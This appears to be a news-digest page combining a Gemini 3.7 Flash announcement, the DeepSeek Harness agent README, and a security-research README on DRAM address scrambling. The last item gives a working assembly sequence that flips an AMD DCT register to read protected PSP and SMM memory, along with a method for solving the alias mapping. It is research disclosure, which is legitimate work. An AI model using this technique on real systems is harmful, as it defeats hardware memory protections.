10 interesting stories served every morning and every evening.

Gemini 3.7 Flash

ai.google.dev

Gemini 3.7 Flash is the next it­er­a­tion in the Gemini 3 se­ries of highly-ca­pa­ble, na­tively mul­ti­modal, rea­son­ing mod­els.

Documentation

Visit the Latest model page for full cov­er­age of fea­tures and ca­pa­bil­i­ties.

gem­ini-3.7-flash

Inputs

Text, Image, Video, Audio, and PDF

Output

Text

Input to­ken limit

1,048,576

Output to­ken limit

65,536

Audio gen­er­a­tion

Not sup­ported

Caching

Supported

Code ex­e­cu­tion

Supported

Computer use

Supported (Preview)

File search

Supported

Function call­ing

Supported

Grounding with Google Maps

Supported

Image gen­er­a­tion

Not sup­ported

Live API

Not sup­ported

Search ground­ing

Supported

Structured out­puts

Supported

Thinking

Supported (low, medium, high)

Note: min­i­mal is not sup­ported and re­turns an er­ror.

URL con­text

Supported

Batch API

Supported

Flex in­fer­ence

Supported

Priority in­fer­ence

Supported

Stable: gem­ini-3.7-flash

Except as oth­er­wise noted, the con­tent of this page is li­censed un­der the Creative Commons Attribution 4.0 License, and code sam­ples are li­censed un­der the Apache 2.0 License. For de­tails, see the Google Developers Site Policies. Java is a reg­is­tered trade­mark of Oracle and/​or its af­fil­i­ates.

Last up­dated 2026 – 08-13 UTC.

Introducing Gemini 3.7 Flash

blog.google

Aug 13, 2026

|

Our most in­tel­li­gent work­horse model yet for cod­ing and agents.

Your browser does not sup­port the au­dio el­e­ment.

Listen to ar­ti­cle

[[duration]] min­utes

This con­tent is gen­er­ated by Google AI. Generative AI is ex­per­i­men­tal

Today, we’re build­ing on the progress of our widely used Flash se­ries by in­tro­duc­ing Gemini 3.7 Flash, our most in­tel­li­gent work­horse model yet for cod­ing and agents.

This re­lease comes just three weeks af­ter Gemini 3.6 Flash, and is a di­rect re­sult of de­vel­oper feed­back and al­go­rith­mic in­no­va­tions that we look for­ward to bring­ing to fu­ture mod­els. 3.7 Flash de­liv­ers sub­stan­tial im­prove­ments across soft­ware en­gi­neer­ing, knowl­edge work, and web de­vel­op­ment work­flows — with an in­tro­duc­tory price of half the orig­i­nal 3.6 Flash cost per mil­lion to­kens.

Better in­tel­li­gence for com­plex work­flows

3.7 Flash shows strong gains over 3.6 Flash in cod­ing tasks like de­bug­ging and is­sue res­o­lu­tion. It also achieves higher first-pass code ac­cu­racy and has im­proved per­for­mance in gen­er­at­ing pro­duc­tion-ready code as seen in FrontierCode 1.1 Main (43.6% vs 34.4%) and DeepSWE v1.1 (65.3% vs 49.0%).

In web de­vel­op­ment, 3.7 Flash gen­er­ates more func­tional lay­outs and fea­ture-com­plete apps in fewer prompts. For UI gen­er­a­tion, the model shows high de­sign ad­her­ence and par­ity based on a ref­er­ence in­put, whether it’s a screen­shot, an im­age, or a full de­sign sys­tem. It out­per­forms 3.6 Flash on Arena.ai’s WebDev Arena with an Elo score of 1588 vs 1538.

For knowl­edge-dense fields like fi­nance, law, and bio­sciences, 3.7 Flash de­liv­ers im­proved rea­son­ing and ac­cu­racy. It sig­nif­i­cantly out­per­forms 3.6 Flash on the GDP.pdf bench­mark (34.0% vs 22.0%), an eval for test­ing a mod­el’s abil­ity to process com­plex doc­u­ments. It also sur­passes 3.6 Flash in AutomationBench, demon­strat­ing it can more ef­fec­tively com­plete real-world busi­ness work­flows (30.4% vs 17.0%).

Better de­vel­oper ex­pe­ri­ence and price

Gemini 3.7 Flash de­liv­ers a no­tice­ably im­proved de­vel­oper ex­pe­ri­ence over 3.6 Flash. It bet­ter adapts to road­blocks, clar­i­fies in­tent when needed, and fol­lows in­struc­tions with greater fi­delity. It thinks more dili­gently, putting in more ef­fort into multi-step plan­ning and tool calls. A more dis­ci­plined ex­e­cu­tion means less man­ual over­sight and fewer re­tries across en­gi­neer­ing work­flows.

3.7 Flash is avail­able through the end of the year at an in­tro­duc­tory price

1

of $0.75/1M in­put to­kens and $3.75/1M out­put to­kens. This price com­bined with the en­hanced model per­for­mance en­ables de­vel­op­ers and cus­tomers to scale pro­duc­tion-ready agents cost ef­fec­tively.

Early cus­tomer feed­back is high­light­ing 3.7 Flash’s per­for­mance and pre­ci­sion, achiev­ing re­sults that are sig­nif­i­cantly bet­ter than 3.6 Flash at a low cost.

Improving Gemini Spark with 3.7 Flash

Gemini Spark, avail­able to Google AI Pro and Ultra sub­scribers in over 160 coun­tries, will be us­ing Gemini 3.7 Flash start­ing to­day. We launched Spark at I/O as your per­sonal AI agent that runs 24/7, tak­ing ac­tion on your be­half while un­der your di­rec­tion. This model up­date makes Spark more ef­fi­cient for knowl­edge work with im­proved tool use for Google Workspace apps, de­liv­er­ing im­proved ac­cu­racy and out­put qual­ity for com­plex, multi-skill work­flows.

With 3.7 Flash, Gemini Spark can turn ideas into ac­tion more ef­fi­ciently by con­sol­i­dat­ing files, draft­ing emails, and up­dat­ing sta­tus doc­u­ments.

Built with safety in mind

We con­tin­u­ally work to im­prove the cov­er­age and ro­bust­ness of Frontier Safety safe­guards. Gemini 3.7 Flash is ship­ping with up­dated safe­guards against mis­use in the do­mains of Chemical, Biological, Radiological, and Nuclear (CBRN) and cy­ber of­fense, while en­abling ben­e­fi­cial use cases, in ac­cor­dance with our ap­proach to biore­silience and our cy­ber pro­gram.

For more in­for­ma­tion, see the 3.7 Flash model card.

Try it to­day

Developers: Explore agent-first work­flows in Google Antigravity or start build­ing to­day in the Gemini API via Google AI Studio and Android Studio. Get started with our de­vel­oper guide.

Enterprises: Access 3.7 Flash in Gemini Enterprise Agent Platform and the Gemini Enterprise app.

Individuals: Available via Spark, your 24/7 per­sonal agent in the Gemini app for Google AI Pro and Ultra sub­scribers in sup­ported coun­tries.

Detailed bench­marks

Get the lat­est news from Google in your in­box

Sign up for our newslet­ters with prod­uct up­dates, event in­for­ma­tion, spe­cial of­fers, and more.

Your in­for­ma­tion will be used in ac­cor­dance with Google’s pri­vacy pol­icy. You may opt out at any time.

GitHub - deepseek-ai/deepseek-harness: DeepSeek Harness: Everything is a Plugin.

github.com

English | 中文

DeepSeek Harness (dsh) is an open-source agent har­ness de­vel­oped by DeepSeek AI.

It uses an ar­chi­tec­ture where every­thing is a plu­gin, and is pow­ered by Cordis, whose de­sign is de­scribed in A Programming Paradigm for Spatiotemporal Composability.

Developer pre­view

DeepSeek Harness is cur­rently in de­vel­oper pre­view and is it­er­at­ing rapidly. THERE WILL BE COMPATIBILITY-BREAKING CHANGES.

Run

Run from npm

Install Node.js, then run:

npx @deepseek-ai/dsh web

The com­mand starts the Web UI, served at http://​127.0.0.1:3080 by de­fault. See Web UI guide.

Run from source

To run from a repos­i­tory check­out:

git clone https://​github.com/​deepseek-ai/​deepseek-har­ness.git cd deepseek-har­ness pnpm in­stall pnpm run build pnpm dsh web

Community and sup­port

Feel free to sub­mit feed­back or bug re­ports through GitHub Discussions.

Add the dsh-plu­gin topic to your plu­gin repos­i­tory for dis­cov­er­abil­ity.

Join DeepSeek Harness Discord com­mu­nity.

Contributing

See CONTRIBUTING.md.

Development

Start with the de­vel­op­ment guide and ar­chi­tec­ture doc­u­men­ta­tion.

For agents, fol­low AGENTS.md.

License

MIT

Third-party de­pen­den­cies and their li­censes are dis­closed in THIRD_PARTY_NOTICES.md.

DeepSeek Harness developer preview: Everything is a plugin

deepseek.com

Agent = Model + Harness

Harnesskeeps agents work­ing in real-world en­vi­ron­ments

The model is the soul of an agent.

A har­ness lets an agent un­der­stand its en­vi­ron­ment, use tools, and keep work­ing in real-world set­tings.

Cordis ker­nel

The Cordis ker­nel man­ages plu­gin mount­ing, un­mount­ing, and de­pen­den­cies. Agent ca­pa­bil­i­ties live in the plu­g­ins.

Capabilities as plu­g­ins

Plugins pro­vide every agent ca­pa­bil­ity, in­clud­ing mod­els, tools, skills, ses­sions, sand­boxes, stor­age, loops, sched­ul­ing, and the UI. Cordis ser­vices and events let the plu­g­ins work to­gether.

Compose with con­fig­u­ra­tion

Developers can se­lect, swap, or ex­tend any ca­pa­bil­ity in con­fig­u­ra­tion with­out chang­ing the DeepSeek Harness source code.

Customize your DeepSeek Harness

Get started

Try it now or in­stall from source

Quick start

Install Node.js, then launch the Web UI with npx.

$ npx @deepseek-ai/dsh web

Install from source

Clone the full source and fol­low the setup in­struc­tions in the repos­i­tory.

$ git clone https://​github.com/​deepseek-ai/​deepseek-har­ness

GitHub - xoreaxeaxeax/skitter-creek-bath-salts: Unlocking _everything_ on the CPU with DRAM scrambling

github.com

Unlocking every­thing on the CPU with DRAM scram­bling — PSP, C6, mi­croc­ode, SMM, and any­thing else the specs left out.

Unlocking every­thing on the CPU with DRAM scram­bling — PSP, C6, mi­croc­ode, SMM, and any­thing else the specs left out.

&x == &x.

Usually.

Poke the DRAM con­troller and an ad­dress can be made to land wher­ever you want in mem­ory. skit­ter-creek-bath-salts mod­i­fies the bot­tom lay­ers of the mem­ory hi­er­ar­chy to rewire the phys­i­cal DRAM ad­dress trans­la­tions. This scram­bles plat­form mem­ory, ex­pos­ing pro­tected re­gions of DRAM — carve­outs in­vis­i­ble even to the ker­nel. When the ad­dress trans­la­tions break, so do the se­cu­rity prim­i­tives built on them, and we un­lock every­thing.

TL;DR

Unlock your Platform Security Processor

Unlock System Management Mode

Unlock C6 DRAM

Unlock your CPU mi­croc­ode

Target

Developed and tested on AMD Family 16h CPUs, the last gen­er­a­tion whose datasheets doc­u­ment the DRAM con­troller’s trans­la­tion reg­is­ters — and show that they can’t be locked. 17h and be­yond sim­ply leave this in­for­ma­tion out. The odyssey of *p is sim­i­lar across gen­er­a­tions and ar­chi­tec­tures, and the un­der­ly­ing trans­forms ex­tend even to ARM, RISC-V, and be­yond; skit­ter-creek-bath-salts shows us only how to be­gin.

The odyssey of *p

It’s a long way down.

It’s a long way down.

Memory is built on lay­ers of ab­strac­tion so deep they be­come al­most ab­surd. When your code deref­er­ences *p, it ap­pears to ac­cess the DRAM at p. It does not — p is a vir­tual ad­dress, and be­fore a sin­gle bit of DRAM is touched, it must sur­vive the gaunt­let be­low:

── CPU core / MMU ───────────────────────────────────────────────── ┌─ VA ← 64-bit vir­tual ad­dress from load/​store │ └> canon­i­cal-form check ──────────────────────┐ ← bits [63:48] sign-ex­tend from bit 47 ┌─ seg­ment base add <─────────────────────────┘ ← FS.base / GS.base (MSR_FS_BASE, MSR_GS_BASE) │ └> TLB probe ─────────────────────────────────┐ ← tagged by PCID (host) / VPID (guest) hit → phys­i­cal ad­dress k │ miss → en­gage hard­ware page walker │ ┌─ page walk (from CR3) <─────────────────────┘ ← walked only on TLB miss │ PML5[VA 56:48] ← only if CR4.LA57 │ PML4[VA 47:39] │ PDPT[VA 38:30] ← 1 GiB leaf pos­si­ble │ PD [VA 29:21] ← 2 MiB leaf pos­si­ble │ PT [VA 20:12] │ PTE ← R/W · U/S · NX · A/D · PAT · PCD · PWT · G │ └> per-level checks ──────────────────────────┐ ← eval­u­ated at every level of the walk priv­i­lege (U/S) │ ← CPL vs PTE.U/S write (R/W) │ ← + CR0.WP ex­e­cute (NX) │ ← EFER.NXE SMEP / SMAP │ ← CR4.SMEP · CR4.SMAP · EFLAGS.AC pro­tec­tion keys │ ← PKRU (user) · IA32_PKRS (supervisor) ┌─ A/D bit up­date <───────────────────────────┘ ← locked RMW on PTE │ └> if guest: EPT / NPT re-walk ───────────────┐ ← each guest-PA above re-walked EPT-PML4 → EPT-PDPT → EPT-PD → EPT-PT │ ← + EPT mem­ory-type over­ride ⇒ ~5× walks per sin­gle guest walk │ ┌─ TLB shoot­down IPIs <───────────────────────┘ ← in­vlpg broad­cast to peer vC­PUs │ │ ── IOMMU (chipset / I/O fab­ric) ────────────────────────────────── │ └> if de­vice-ini­ti­ated, IOMMU page walk ──────┐ ← VT-d / AMD-Vi: de­vice-ID → do­main → ta­bles │ ┌── **physical ad­dress k** <─────────────────┘ │ │ ── CPU core / MMU — mem­ory-type res­o­lu­tion ──────────────────────── │ └> MTRR range match ──────────────────────────┐ ← IA32_MTRR_DEF_TYPE + fixed/​vari­able MTRRs ┌─ PAT en­try se­lect <─────────────────────────┘ ← IA32_PAT[ PTE.PAT:PCD:PWT ] │ └> ef­fec­tive mem­ory type ─────────────────────┐ ← { WB, WT, WC, WP, UC-, UC } │ ── CPU un­core — caches & co­her­ence ────────────────────────────────┌─ L1-D probe <───────────────────────────────┘ ← VIPT, per-core │ └> L2 probe ──────────────────────────────────┐ ← per-core / per-CCX ┌─ LLC probe + di­rec­tory con­sult <────────────┘ ← shared, sliced │ └> snoop / co­her­ence ─────────────────────────┐MESI / MOESI broad­cast in­tra-socket │ ← broad­cast to peer cores in­ter-socket │ ← QPI · UPI · Infinity Fabric · CXL.cache home-node di­rec­tory re­sponse │ ← data | in­ter­ven­tion | abort │ ── sys­tem data fab­ric / in­ter­con­nect ──────────────────────────────┌─ if MMIO range or sub-4 GiB MMIO hole <─────┘ ← un­core/​data fab­ric posted/​non-posted txn │ → de­vice BAR; done │ └> else DRAM-bound: data fab­ric / mesh ───────┐AMD DF · Intel mesh-or-ring un­core │ ┏━━ ── MCT / IMC (memory con­troller) ──────────────────────────────── W ┃ ┌─ DRAM hole remap <──────────────────────────┘ ← high-mem­ory remap above TOM E ┃ │ ┃ └> mem­ory-re­gion ex­clu­sion remap ─────────────┐ ← re­served / pro­tected ranges ┃ ┌─ chan­nel in­ter­leave hash <──────────────────┘ ← XOR of se­lected PA bits → chan­nel A ┃ │ R ┃ └> rank in­ter­leave hash ──────────────────────┐XOR of se­lected PA bits → rank E ┃ ┌─ bank in­ter­leave hash <─────────────────────┘ ← XOR of se­lected PA bits → bank ┃ │ ┃ └> bank swiz­zle / XOR scram­ble ───────────────┐ ← ven­dor- and BIOS-configurable H ┃ ┌─ chip-se­lect nor­mal­ize (DCT) <──────────────┘ ← per-rank CS line E ┃ │ rank → CS map R ┃ │ E ┃ └> sub-chan­nel se­lect ────────────────────────┐DDR5 / LPDDR5 only ┗━━ │ │ DRAM co­or­di­nates <─────────────────────────┘ ← bank group · bank · row (RAS) · col­umn (CAS)

This pro­ject works at the deep­est lev­els of the *p pipeline, the MCT/DCT layer — where a phys­i­cal ad­dress from the data fab­ric/​in­ter­con­nect en­ters the mem­ory con­troller and is rewrit­ten one fi­nal time into the raw DRAM co­or­di­nates that are is­sued to the DIMM.

Spaghettifying DRAM

Physical ad­dresses are re­ally more of a sug­ges­tion.

Physical ad­dresses are re­ally more of a sug­ges­tion.

xor dword [0xf80c2094], 0x00400000

That’s the ex­ploit. All of it.

One bit-flip in the DRAM con­troller rewires the bot­tom of the *p pipeline, and the data that was at &x is now some­where else mid-flight. Suddenly &x != &x. Every mech­a­nism the CPU, firmware, un­core, and chipset use to wall off pro­tected mem­ory sits above the mem­ory con­troller, and none of it sees what hap­pens be­low. The fences guard phys­i­cal ad­dresses, not DRAM co­or­di­nates; re­arrange the co­or­di­nates and the bar­ri­ers above never no­tice.

But rewiring DRAM is easy. The bit above is the bank-swiz­zle-mode in the DCT, and it’s just one of dozens that con­trol the ad­dress remaps at the fi­nal layer — all you have to do is poke them to make every­thing built on top top­ple. The harder part then is keep­ing the plat­form up as the en­tirety of sys­tem mem­ory is scram­bled un­der­neath it.

The trick: be fast, and don’t touch DRAM. Disable the APs, prime the TLBs, warm the cache, dis­able in­ter­rupts, flush the tar­get, se­ri­al­ize mem­ory ac­cesses, and hope the CPU prefetched the up­com­ing in­struc­tions. Then rewire the MCT/DCT to spaghet­tify DRAM, grab some data from the pro­tected re­gion, re­vert the map­pings, se­ri­al­ize again, en­able in­ter­rupts, re­sume the APs, and the plat­form is back to nor­mal.

mov eax, [0xf80c2094]  ; prime mmio TLB mov eax, [0x6f800000]  ; prime tar­get TLB pushf  ; pre­serve flags cli  ; in­ter­rupts off clflush [0x6f800000]  ; evict the tar­get, force the dram read mfence  ; bar­rier - no co­her­ent world dram ac­cess lfence  ; re­ordered into spaghet­ti­fied view xor dword [0xf80c2094], 1<<22  ; flip dct swiz­zle → spaghet­tify dram mov ebx, [0x6f800000]  ; fetch tar­get in spaghet­ti­fied view xor dword [0xf80c2094], 1<<22  ; re­store dct swiz­zle → un­scram­ble mfence  ; bar­rier - no spaghet­ti­fied dram ac­cess lfence  ; re­ordered into co­her­ent world view popf  ; in­ter­rupts back on

With some care­ful setup of pag­ing, cache states, thread­ing, and the TLBs, the ad­dress scram­bling can be made to work from C, to il­lus­trate the *p pipeline col­laps­ing, and the plat­for­m’s cor­rupted view when sud­denly &x != &x:

So we can rewire the map and re­store it with­out a trace. All that’s left is know­ing what we rewired it into.

Unlocking every­thing

Every pro­tected mem­ory re­gion on the plat­form, reach­able with a cal­cu­la­tor.

Every pro­tected mem­ory re­gion on the plat­form, reach­able with a cal­cu­la­tor.

With the above ap­proach, we can re­pro­gram the MCT/DCT trans­form on a run­ning sys­tem — re­ar­rang­ing the low­est stage of the *p pipeline to scram­ble mem­ory out from un­der­neath every pro­tec­tion built above it.

But there’s a chal­lenge: while we can re­pro­gram the trans­la­tion with a sim­ple xor dword [0xf80c2094], 0x00400000, we have no idea what new trans­forms the MCT/DCT will use (the datasheets are un­der­spec­i­fied here — the xor maps are off, the MMIO sub­trac­tive stage is un­ordered, and de­tails vary across mod­els). Without this, mem­ory scram­bles, but we have no way to re­con­struct it.

Fortunately, the DRAM con­troller’s ad­dress trans­form is a GF(2) lin­ear map, which means we can re­con­struct the scram­bled mem­ory with ba­sic lin­ear al­ge­bra.

First, con­sider the nor­mal case: the for­ward trans­form of the de­fault MCT/DCT con­fig­u­ra­tion gets ap­plied to some phys­i­cal ad­dress, which lands on a se­cret in DRAM:

┌ ┐ ┌ ┐ ┌ ┐ │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ · │ 1 │ = │ 1 │ │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │ │ 0 │ │ 0 │ └ ┘ └ ┘ └ ┘ M_firmware tar­get se­cret

This is the co­her­ent view of mem­ory: the low­est stage of the *p pipeline op­er­ates ex­actly as it should.

Now rewire the MCT/DCT stage of *p with xor dword [0xf80c2094], 0x00400000, and the plat­form en­ters a scram­bled/​spaghet­ti­fied view of mem­ory where a dif­fer­ent trans­form al­lows an alias to reach the same DRAM se­cret:

┌ ┐ ┌ ┐ ┌ ┐ │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 1 0 0 1 0 0 1 0 0 │ │ 1 │ │ 0 │ │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │ · │ 0 │ = │ 1 │ │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │ │ 0 │ │ 0 │ └ ┘ └ ┘ └ ┘ M_attacker alias se­cret

This alias lets us reach the same se­cret with­out hit­ting the ex­ist­ing plat­form locks and de­fenses built for the co­her­ent view. To find the alias, com­pose the in­verse of the at­tack­ing/​spaghet­ti­fied hash with the for­ward of the firmware/​co­her­ent hash, to get the trans­la­tion that will reach any se­cret from the ma­li­cious MCT/DCT con­fig­u­ra­tion:

┌ ┐ ┌ ┐ ┌ ┐ ┌ ┐ │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │ │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 1 │ │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │ │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │ │ 0 │ │ 1 │ │ 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 1 │ · │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ · │ 1 │ = │ 0 │ │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │ │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │ │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │ │ 1 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │ │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │ │ 0 │ │ 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │ │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │ │ 0 │ │ 0 │ └ ┘ └ ┘ └ ┘ └ ┘ M_attacker⁻¹ M_firmware tar­get alias

The only chal­lenge is that the ma­tri­ces are un­known, which means we have no idea how mem­ory is ac­tu­ally scram­bled, and no trans­form to use to reach the se­cret in the first place:

┌ ┐ ┌ ┐ ┌ ┐ ┌ ┐ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 1 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ · │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ · │ 1 │ = │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 1 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ │ 0 │ │ ? │ └ ┘ └ ┘ └ ┘ └ ┘ M_attacker⁻¹ M_firmware tar­get alias

Fortunately, at this point it’s just lin­ear al­ge­bra, and you could solve the trans­forms by hand if you want. Or: a cal­cu­la­tor.

We use z3. First, the SMT solver needs con­straints to work with.

Start in the co­her­ent view, mod­ify the MCT/DCT to switch to the spaghet­ti­fied view, drop some sen­tinel value like 0xdeadc0de into a ran­dom ad­dress in mem­ory, flip back to the co­her­ent view, and sweep mem­ory for where the sen­tinel resur­faces. This gives a (target, alias) pair — a con­crete dat­a­point show­ing two phys­i­cal ad­dresses that map to the same cell in DRAM. Repeat the process, gather a hand­ful of data, pass it to z3, and it solves the trans­la­tion ma­trix needed to con­vert be­tween the two views — any co­her­ent-view phys­i­cal ad­dress on one side, its spaghet­ti­fied-view alias on the other:

